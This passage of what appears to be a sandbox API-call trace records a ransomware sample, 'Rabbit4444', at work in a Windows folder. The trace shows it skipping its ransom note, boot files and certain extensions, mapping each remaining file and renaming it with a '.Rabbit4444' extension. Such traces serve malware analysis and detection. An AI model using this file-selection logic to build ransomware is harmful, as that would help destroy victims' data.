lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13660169107) returned 1 [0045.291] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=250186) returned 1 [0045.291] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1179c8 [0045.291] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101738 [0045.291] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3d450, lpName=0x0) returned 0x280 [0045.293] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3d450) returned 0x70000 [0045.300] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x10c928 [0045.300] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0045.300] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0045.300] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0045.300] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0045.300] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0045.301] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0045.301] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0045.301] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13661136179) returned 1 [0045.301] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1179c8 | out: hHeap=0xe0000) returned 1 [0045.301] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101738 | out: hHeap=0xe0000) returned 1 [0045.301] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0045.303] CloseHandle (hObject=0x280) returned 1 [0045.303] CloseHandle (hObject=0x278) returned 1 [0045.309] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\upgrader_default.log.Rabbit4444") returned 51 [0045.309] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\upgrader_default.log" (normalized: "c:\\windows10upgrade\\upgrader_default.log"), lpNewFileName="C:\\Windows10Upgrade\\upgrader_default.log.Rabbit4444" (normalized: "c:\\windows10upgrade\\upgrader_default.log.rabbit4444"), dwFlags=0x1) returned 1 [0045.310] InterlockedExchangeAdd (in: Addend=0xff618, Value=250192 | out: Addend=0xff618) returned 1484704 [0045.310] InterlockedExchangeAdd (in: Addend=0xff624, Value=9 | out: Addend=0xff624) returned 2015 [0045.310] FindNextFileW (in: hFindFile=0x102450, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xccdc86a8, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xccdc86a8, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x32fe02cc, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x5044, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="upgrader_win10.log", cAlternateFileName="UPGRAD~2.LOG")) returned 1 [0045.310] lstrcmpiW (lpString1="upgrader_win10.log", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.310] lstrcmpiW (lpString1="upgrader_win10.log", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.310] lstrcmpiW (lpString1="upgrader_win10.log", lpString2="Rabbit4444.exe") returned 1 [0045.310] lstrcmpiW (lpString1="upgrader_win10.log", lpString2=".") returned 1 [0045.310] lstrcmpiW (lpString1="upgrader_win10.log", lpString2="..") returned 1 [0045.310] lstrcmpiW (lpString1="upgrader_win10.log", lpString2="windows") returned -1 [0045.310] lstrcmpiW (lpString1="upgrader_win10.log", lpString2="bootmgr") returned 1 [0045.310] lstrcmpiW (lpString1="upgrader_win10.log", lpString2="pagefile.sys") returned 1 [0045.310] lstrcmpiW (lpString1="upgrader_win10.log", lpString2="boot") returned 1 [0045.310] lstrcmpiW (lpString1="upgrader_win10.log", lpString2="ids.txt") returned 1 [0045.310] lstrcmpiW (lpString1="upgrader_win10.log", lpString2="NTUSER.DAT") returned 1 [0045.310] lstrcpyW (in: lpString1=0x130eb60, lpString2="upgrader_win10.log" | out: lpString1="upgrader_win10.log") returned="upgrader_win10.log" [0045.310] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\upgrader_win10.log", dwFileAttributes=0x0) returned 1 [0045.311] lstrlenW (lpString="upgrader_win10.log") returned 18 [0045.311] lstrlenW (lpString="Rabbit4444") returned 10 [0045.311] lstrcmpiW (lpString1="_win10.log", lpString2="Rabbit4444") returned -1 [0045.311] lstrlenW (lpString=".dll") returned 4 [0045.311] lstrcmpiW (lpString1=".log", lpString2=".dll") returned 1 [0045.311] lstrlenW (lpString=".lnk") returned 4 [0045.311] lstrcmpiW (lpString1=".log", lpString2=".lnk") returned 1 [0045.311] lstrlenW (lpString=".ini") returned 4 [0045.311] lstrcmpiW (lpString1=".log", lpString2=".ini") returned 1 [0045.311] lstrlenW (lpString=".sys") returned 4 [0045.311] lstrcmpiW (lpString1=".log", lpString2=".sys") returned -1 [0045.311] CreateFileW (lpFileName="C:\\Windows10Upgrade\\upgrader_win10.log" (normalized: "c:\\windows10upgrade\\upgrader_win10.log"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0045.311] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0045.311] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13662189338) returned 1 [0045.311] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=20548) returned 1 [0045.311] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0045.311] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1021d8 [0045.311] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5350, lpName=0x0) returned 0x280 [0045.312] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5350) returned 0x70000 [0045.314] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x10c928 [0045.314] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0045.314] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0045.314] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0045.314] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0045.315] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0045.315] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0045.315] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0045.315] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13662544635) returned 1 [0045.315] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0045.315] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1021d8 | out: hHeap=0xe0000) returned 1 [0045.315] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0045.315] CloseHandle (hObject=0x280) returned 1 [0045.315] CloseHandle (hObject=0x278) returned 1 [0045.317] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\upgrader_win10.log.Rabbit4444") returned 49 [0045.317] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\upgrader_win10.log" (normalized: "c:\\windows10upgrade\\upgrader_win10.log"), lpNewFileName="C:\\Windows10Upgrade\\upgrader_win10.log.Rabbit4444" (normalized: "c:\\windows10upgrade\\upgrader_win10.log.rabbit4444"), dwFlags=0x1) returned 1 [0045.317] InterlockedExchangeAdd (in: Addend=0xff618, Value=20560 | out: Addend=0xff618) returned 1734896 [0045.317] InterlockedExchangeAdd (in: Addend=0xff624, Value=3 | out: Addend=0xff624) returned 2024 [0045.318] FindNextFileW (in: hFindFile=0x102450, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea63f06a, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea63f06a, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xfb529700, ftLastWriteTime.dwHighDateTime=0x1d2fc76, nFileSizeHigh=0x0, nFileSizeLow=0x880c8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wimgapi.dll", cAlternateFileName="")) returned 1 [0045.318] lstrcmpiW (lpString1="wimgapi.dll", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.318] lstrcmpiW (lpString1="wimgapi.dll", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.318] lstrcmpiW (lpString1="wimgapi.dll", lpString2="Rabbit4444.exe") returned 1 [0045.318] lstrcmpiW (lpString1="wimgapi.dll", lpString2=".") returned 1 [0045.318] lstrcmpiW (lpString1="wimgapi.dll", lpString2="..") returned 1 [0045.318] lstrcmpiW (lpString1="wimgapi.dll", lpString2="windows") returned -1 [0045.318] lstrcmpiW (lpString1="wimgapi.dll", lpString2="bootmgr") returned 1 [0045.318] lstrcmpiW (lpString1="wimgapi.dll", lpString2="pagefile.sys") returned 1 [0045.318] lstrcmpiW (lpString1="wimgapi.dll", lpString2="boot") returned 1 [0045.318] lstrcmpiW (lpString1="wimgapi.dll", lpString2="ids.txt") returned 1 [0045.318] lstrcmpiW (lpString1="wimgapi.dll", lpString2="NTUSER.DAT") returned 1 [0045.318] lstrcpyW (in: lpString1=0x130eb60, lpString2="wimgapi.dll" | out: lpString1="wimgapi.dll") returned="wimgapi.dll" [0045.318] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\wimgapi.dll", dwFileAttributes=0x0) returned 1 [0045.319] lstrlenW (lpString="wimgapi.dll") returned 11 [0045.319] lstrlenW (lpString="Rabbit4444") returned 10 [0045.319] lstrcmpiW (lpString1="imgapi.dll", lpString2="Rabbit4444") returned -1 [0045.319] lstrlenW (lpString=".dll") returned 4 [0045.319] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0045.319] FindNextFileW (in: hFindFile=0x102450, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea642af3, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea642af3, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xfb529700, ftLastWriteTime.dwHighDateTime=0x1d2fc76, nFileSizeHigh=0x0, nFileSizeLow=0xdf8c8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="windlp.dll", cAlternateFileName="")) returned 1 [0045.319] lstrcmpiW (lpString1="windlp.dll", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.319] lstrcmpiW (lpString1="windlp.dll", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.319] lstrcmpiW (lpString1="windlp.dll", lpString2="Rabbit4444.exe") returned 1 [0045.319] lstrcmpiW (lpString1="windlp.dll", lpString2=".") returned 1 [0045.319] lstrcmpiW (lpString1="windlp.dll", lpString2="..") returned 1 [0045.319] lstrcmpiW (lpString1="windlp.dll", lpString2="windows") returned -1 [0045.319] lstrcmpiW (lpString1="windlp.dll", lpString2="bootmgr") returned 1 [0045.319] lstrcmpiW (lpString1="windlp.dll", lpString2="pagefile.sys") returned 1 [0045.319] lstrcmpiW (lpString1="windlp.dll", lpString2="boot") returned 1 [0045.320] lstrcmpiW (lpString1="windlp.dll", lpString2="ids.txt") returned 1 [0045.320] lstrcmpiW (lpString1="windlp.dll", lpString2="NTUSER.DAT") returned 1 [0045.320] lstrcpyW (in: lpString1=0x130eb60, lpString2="windlp.dll" | out: lpString1="windlp.dll") returned="windlp.dll" [0045.320] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\windlp.dll", dwFileAttributes=0x0) returned 1 [0045.320] lstrlenW (lpString="windlp.dll") returned 10 [0045.320] lstrlenW (lpString="Rabbit4444") returned 10 [0045.320] lstrcmpiW (lpString1="windlp.dll", lpString2="Rabbit4444") returned 1 [0045.320] lstrlenW (lpString=".dll") returned 4 [0045.320] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0045.320] FindNextFileW (in: hFindFile=0x102450, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea64a022, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea64a022, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xfb529700, ftLastWriteTime.dwHighDateTime=0x1d2fc76, nFileSizeHigh=0x0, nFileSizeLow=0x159ac8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows10UpgraderApp.exe", cAlternateFileName="WINDOW~1.EXE")) returned 1 [0045.320] lstrcmpiW (lpString1="Windows10UpgraderApp.exe", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.320] lstrcmpiW (lpString1="Windows10UpgraderApp.exe", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.320] lstrcmpiW (lpString1="Windows10UpgraderApp.exe", lpString2="Rabbit4444.exe") returned 1 [0045.320] lstrcmpiW (lpString1="Windows10UpgraderApp.exe", lpString2=".") returned 1 [0045.320] lstrcmpiW (lpString1="Windows10UpgraderApp.exe", lpString2="..") returned 1 [0045.320] lstrcmpiW (lpString1="Windows10UpgraderApp.exe", lpString2="windows") returned 1 [0045.320] lstrcmpiW (lpString1="Windows10UpgraderApp.exe", lpString2="bootmgr") returned 1 [0045.320] lstrcmpiW (lpString1="Windows10UpgraderApp.exe", lpString2="pagefile.sys") returned 1 [0045.320] lstrcmpiW (lpString1="Windows10UpgraderApp.exe", lpString2="boot") returned 1 [0045.320] lstrcmpiW (lpString1="Windows10UpgraderApp.exe", lpString2="ids.txt") returned 1 [0045.320] lstrcmpiW (lpString1="Windows10UpgraderApp.exe", lpString2="NTUSER.DAT") returned 1 [0045.320] lstrcpyW (in: lpString1=0x130eb60, lpString2="Windows10UpgraderApp.exe" | out: lpString1="Windows10UpgraderApp.exe") returned="Windows10UpgraderApp.exe" [0045.320] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\Windows10UpgraderApp.exe", dwFileAttributes=0x0) returned 1 [0045.321] lstrlenW (lpString="Windows10UpgraderApp.exe") returned 24 [0045.322] lstrlenW (lpString="Rabbit4444") returned 10 [0045.322] lstrcmpiW (lpString1="derApp.exe", lpString2="Rabbit4444") returned -1 [0045.322] lstrlenW (lpString=".dll") returned 4 [0045.322] lstrcmpiW (lpString1=".exe", lpString2=".dll") returned 1 [0045.322] lstrlenW (lpString=".lnk") returned 4 [0045.322] lstrcmpiW (lpString1=".exe", lpString2=".lnk") returned -1 [0045.322] lstrlenW (lpString=".ini") returned 4 [0045.322] lstrcmpiW (lpString1=".exe", lpString2=".ini") returned -1 [0045.322] lstrlenW (lpString=".sys") returned 4 [0045.322] lstrcmpiW (lpString1=".exe", lpString2=".sys") returned -1 [0045.322] CreateFileW (lpFileName="C:\\Windows10Upgrade\\Windows10UpgraderApp.exe" (normalized: "c:\\windows10upgrade\\windows10upgraderapp.exe"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0045.323] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0045.323] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13663332839) returned 1 [0045.323] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1415880) returned 1 [0045.323] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0045.323] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1021d8 [0045.323] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x159dd0, lpName=0x0) returned 0x280 [0045.324] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x159dd0) returned 0x2f20000 [0045.821] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x10c928 [0045.821] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0045.821] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0045.821] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0045.821] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0045.821] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0045.821] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0045.821] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0045.821] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13713193230) returned 1 [0045.821] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0045.821] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1021d8 | out: hHeap=0xe0000) returned 1 [0045.821] UnmapViewOfFile (lpBaseAddress=0x2f20000) returned 1 [0045.916] CloseHandle (hObject=0x280) returned 1 [0045.916] CloseHandle (hObject=0x278) returned 1 [0046.076] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\Windows10UpgraderApp.exe.Rabbit4444") returned 55 [0046.076] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\Windows10UpgraderApp.exe" (normalized: "c:\\windows10upgrade\\windows10upgraderapp.exe"), lpNewFileName="C:\\Windows10Upgrade\\Windows10UpgraderApp.exe.Rabbit4444" (normalized: "c:\\windows10upgrade\\windows10upgraderapp.exe.rabbit4444"), dwFlags=0x1) returned 1 [0046.077] InterlockedExchangeAdd (in: Addend=0xff618, Value=1415888 | out: Addend=0xff618) returned 1755456 [0046.077] InterlockedExchangeAdd (in: Addend=0xff624, Value=498 | out: Addend=0xff624) returned 2027 [0046.077] FindNextFileW (in: hFindFile=0x102450, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea64ee41, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea64ee41, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xfb529700, ftLastWriteTime.dwHighDateTime=0x1d2fc76, nFileSizeHigh=0x0, nFileSizeLow=0x62c8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WinREBootApp32.exe", cAlternateFileName="WINREB~1.EXE")) returned 1 [0046.077] lstrcmpiW (lpString1="WinREBootApp32.exe", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0046.077] lstrcmpiW (lpString1="WinREBootApp32.exe", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.077] lstrcmpiW (lpString1="WinREBootApp32.exe", lpString2="Rabbit4444.exe") returned 1 [0046.077] lstrcmpiW (lpString1="WinREBootApp32.exe", lpString2=".") returned 1 [0046.077] lstrcmpiW (lpString1="WinREBootApp32.exe", lpString2="..") returned 1 [0046.077] lstrcmpiW (lpString1="WinREBootApp32.exe", lpString2="windows") returned 1 [0046.077] lstrcmpiW (lpString1="WinREBootApp32.exe", lpString2="bootmgr") returned 1 [0046.077] lstrcmpiW (lpString1="WinREBootApp32.exe", lpString2="pagefile.sys") returned 1 [0046.077] lstrcmpiW (lpString1="WinREBootApp32.exe", lpString2="boot") returned 1 [0046.077] lstrcmpiW (lpString1="WinREBootApp32.exe", lpString2="ids.txt") returned 1 [0046.077] lstrcmpiW (lpString1="WinREBootApp32.exe", lpString2="NTUSER.DAT") returned 1 [0046.077] lstrcpyW (in: lpString1=0x130eb60, lpString2="WinREBootApp32.exe" | out: lpString1="WinREBootApp32.exe") returned="WinREBootApp32.exe" [0046.077] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\WinREBootApp32.exe", dwFileAttributes=0x0) returned 1 [0046.078] lstrlenW (lpString="WinREBootApp32.exe") returned 18 [0046.078] lstrlenW (lpString="Rabbit4444") returned 10 [0046.078] lstrcmpiW (lpString1="tApp32.exe", lpString2="Rabbit4444") returned 1 [0046.078] lstrlenW (lpString=".dll") returned 4 [0046.078] lstrcmpiW (lpString1=".exe", lpString2=".dll") returned 1 [0046.078] lstrlenW (lpString=".lnk") returned 4 [0046.078] lstrcmpiW (lpString1=".exe", lpString2=".lnk") returned -1 [0046.078] lstrlenW (lpString=".ini") returned 4 [0046.078] lstrcmpiW (lpString1=".exe", lpString2=".ini") returned -1 [0046.078] lstrlenW (lpString=".sys") returned 4 [0046.078] lstrcmpiW (lpString1=".exe", lpString2=".sys") returned -1 [0046.078] CreateFileW (lpFileName="C:\\Windows10Upgrade\\WinREBootApp32.exe" (normalized: "c:\\windows10upgrade\\winrebootapp32.exe"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0046.078] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0046.078] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13738908681) returned 1 [0046.078] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=25288) returned 1 [0046.078] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0046.078] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101e20 [0046.079] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x65d0, lpName=0x0) returned 0x298 [0046.079] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x65d0) returned 0x70000 [0046.109] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0046.109] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0046.109] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0046.109] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0046.109] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0046.109] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0046.109] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0046.109] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0046.109] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13742004116) returned 1 [0046.109] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0046.109] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101e20 | out: hHeap=0xe0000) returned 1 [0046.109] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0046.110] CloseHandle (hObject=0x298) returned 1 [0046.110] CloseHandle (hObject=0x278) returned 1 [0046.112] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\WinREBootApp32.exe.Rabbit4444") returned 49 [0046.112] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\WinREBootApp32.exe" (normalized: "c:\\windows10upgrade\\winrebootapp32.exe"), lpNewFileName="C:\\Windows10Upgrade\\WinREBootApp32.exe.Rabbit4444" (normalized: "c:\\windows10upgrade\\winrebootapp32.exe.rabbit4444"), dwFlags=0x1) returned 1 [0046.113] InterlockedExchangeAdd (in: Addend=0xff618, Value=25296 | out: Addend=0xff618) returned 3171344 [0046.113] InterlockedExchangeAdd (in: Addend=0xff624, Value=30 | out: Addend=0xff624) returned 2525 [0046.113] FindNextFileW (in: hFindFile=0x102450, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea6528e0, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea6528e0, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xfb529700, ftLastWriteTime.dwHighDateTime=0x1d2fc76, nFileSizeHigh=0x0, nFileSizeLow=0x64c8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WinREBootApp64.exe", cAlternateFileName="WINREB~2.EXE")) returned 1 [0046.113] lstrcmpiW (lpString1="WinREBootApp64.exe", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0046.113] lstrcmpiW (lpString1="WinREBootApp64.exe", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.113] lstrcmpiW (lpString1="WinREBootApp64.exe", lpString2="Rabbit4444.exe") returned 1 [0046.113] lstrcmpiW (lpString1="WinREBootApp64.exe", lpString2=".") returned 1 [0046.113] lstrcmpiW (lpString1="WinREBootApp64.exe", lpString2="..") returned 1 [0046.113] lstrcmpiW (lpString1="WinREBootApp64.exe", lpString2="windows") returned 1 [0046.113] lstrcmpiW (lpString1="WinREBootApp64.exe", lpString2="bootmgr") returned 1 [0046.113] lstrcmpiW (lpString1="WinREBootApp64.exe", lpString2="pagefile.sys") returned 1 [0046.113] lstrcmpiW (lpString1="WinREBootApp64.exe", lpString2="boot") returned 1 [0046.113] lstrcmpiW (lpString1="WinREBootApp64.exe", lpString2="ids.txt") returned 1 [0046.113] lstrcmpiW (lpString1="WinREBootApp64.exe", lpString2="NTUSER.DAT") returned 1 [0046.113] lstrcpyW (in: lpString1=0x130eb60, lpString2="WinREBootApp64.exe" | out: lpString1="WinREBootApp64.exe") returned="WinREBootApp64.exe" [0046.113] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\WinREBootApp64.exe", dwFileAttributes=0x0) returned 1 [0046.113] lstrlenW (lpString="WinREBootApp64.exe") returned 18 [0046.113] lstrlenW (lpString="Rabbit4444") returned 10 [0046.113] lstrcmpiW (lpString1="tApp64.exe", lpString2="Rabbit4444") returned 1 [0046.113] lstrlenW (lpString=".dll") returned 4 [0046.113] lstrcmpiW (lpString1=".exe", lpString2=".dll") returned 1 [0046.114] lstrlenW (lpString=".lnk") returned 4 [0046.114] lstrcmpiW (lpString1=".exe", lpString2=".lnk") returned -1 [0046.114] lstrlenW (lpString=".ini") returned 4 [0046.114] lstrcmpiW (lpString1=".exe", lpString2=".ini") returned -1 [0046.114] lstrlenW (lpString=".sys") returned 4 [0046.114] lstrcmpiW (lpString1=".exe", lpString2=".sys") returned -1 [0046.114] CreateFileW (lpFileName="C:\\Windows10Upgrade\\WinREBootApp64.exe" (normalized: "c:\\windows10upgrade\\winrebootapp64.exe"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, 